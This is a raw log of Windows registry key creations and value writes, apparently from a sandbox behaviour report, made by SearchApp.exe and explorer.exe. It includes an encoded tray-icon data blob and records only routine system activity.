Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010007000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c100000000000002000000e80703004100720067006a00620065007800200033000a005600610067007200650061007200670020006e0070007000720066006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000074ae2078e323294282c1e41cb67d5b9c000000000000000000000000f76e4b1e3676da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e80703004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000002100000073ae2078e323294282c1e41cb67d5b9c00000000000000000000000078069d1d3676da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a0066000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000500000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e7070c00420061007200510065007600690072000a0041006200670020006600760074006100720071002000760061000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007000000000000000000000000000000000000000000000000000000000000003dfdb3cc472fda0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e7070c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000075ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e7070c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000081ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e7070c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000082ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e7070c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{A5ED4158-F359-4DEC-8D25-9EBED6805E82} C:\Windows\explorer.exe N/A
